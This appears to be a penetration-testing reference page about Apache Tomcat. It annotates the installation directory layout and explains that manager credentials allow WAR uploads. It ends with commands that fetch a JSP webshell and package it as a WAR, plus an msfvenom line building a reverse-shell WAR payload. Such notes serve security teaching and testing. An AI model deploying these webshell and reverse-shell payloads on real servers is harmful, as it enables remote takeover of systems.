Apache Tomcat is an open-source web server that hosts applications written in Java.
Copy /opt/tomcat/ (Tomcat installation directory)
├── bin/ (Startup, shutdown, and management scripts)
│ ├── catalina.sh (Main control script for Tomcat)
│ ├── startup.sh (Starts Tomcat)
│ ├── shutdown.sh (Stops Tomcat)
│ ├── setenv.sh (Optional, sets environment variables)
│ ├── digest.sh (Generates hashed passwords)
│ ├── version.sh (Shows Tomcat version)
│ ├── tool-wrapper.sh (Helper script for Java tools)
│ ├── tomcat-juli.jar (Tomcat logging utility)
│ ├── *.bat (Windows equivalent of shell scripts)
├── conf/ (Configuration files)
│ ├── server.xml (Main configuration file)
│ ├── web.xml (Default web application settings)
│ ├── tomcat-users.xml (User roles and authentication)
│ ├── tomcat-users.xsd (XML schema definition for `tomcat-users.xml`)
│ ├── logging.properties (Logging configuration)
│ ├── catalina.policy (Security policy for Java permissions)
│ ├── catalina.properties (JVM properties)
│ ├── context.xml (Default context settings)
│ ├── jaspic-providers.xml (Java Authentication configuration)
│ ├── jaas.config (Java Authentication and Authorization Service)
├── lib/ (Core Tomcat libraries)
│ ├── servlet-api.jar (Servlet API)
│ ├── tomcat-api.jar (Tomcat core API)
│ ├── tomcat-util.jar (Utility classes)
│ ├── ecj-*.jar (Eclipse Compiler for JSP)
│ ├── jsp-api.jar (JSP API)
│ ├── websocket-api.jar (WebSocket API)
│ ├── *.jar (Additional dependencies)
├── logs/ (Log files)
│ ├── catalina.out (Main log file)
│ ├── localhost.log (Logs specific to the localhost container)
│ ├── manager.log (Logs for Tomcat Manager application)
│ ├── host-manager.log (Logs for Host Manager application)
│ ├── *.log (Other logs)
├── temp/ (Temporary files)
│ ├── tomcat.* (Temporary data storage for Tomcat)
├── webapps/ (Deployed applications)
│ ├── ROOT/ (Default root application)
│ │ ├── index.jsp (Default welcome page)
│ │ ├── WEB-INF/ (Configuration files for the app)
│ ├── manager/ (Tomcat Manager Web UI)
│ │ ├── images/ (Icons and graphics for the UI)
│ │ ├── META-INF/ (Metadata and security settings)
│ │ └── WEB-INF/ (Application configurations)
│ │ ├── web.xml (Defines servlet settings for the Manager app)
│ ├── host-manager/ (Tomcat Virtual Host Manager)
│ ├── docs/ (Tomcat documentation)
│ ├── examples/ (Example applications)
│ ├── myapp.war (Custom deployed application - .war file)
│ ├── <CUSTOMAPP>/ (Custom web application)
│ │ ├── images/ (Custom app images)
│ │ ├── index.jsp (Main entry point of the app)
│ │ ├── META-INF/
│ │ │ └── context.xml (Application-specific context configuration)
│ │ ├── status.xsd (XML Schema for status validation)
│ │ └── WEB-INF/
│ │ ├── jsp/
│ │ │ └── admin.jsp (Admin page JSP)
│ │ ├── lib/
│ │ │ └── jdbc_drivers.jar (Database driver)
│ │ ├── classes/
│ │ │ └── AdminServlet.class (Compiled Servlet for Admin)
│ │ └── web.xml (<--- Defines servlet settings for customapp)
├── work/ (Compiled JSP files and runtime data)
│ ├── Catalina/ (Compiled Java files for JSPs)
│ │ ├── localhost/
│ │ │ ├── _ (Default webapp compilation)
│ │ │ ├── myapp/ (Compiled JSPs for a deployed application)
└── LICENSE (License information)
└── NOTICE (Legal notices)
└── RELEASE-NOTES (Release notes)
Many Tomcat installations provide a GUI interface to manage the application. This interface is available at /manager/html by default, which only users assigned the manager-gui role are allowed to access. Valid manager credentials can be used to upload a packaged Tomcat application (.WAR file) and compromise the application. A WAR, or Web Application Archive, is used to quickly deploy web applications and backup storage.
Copy wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
Copy msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > backup.war 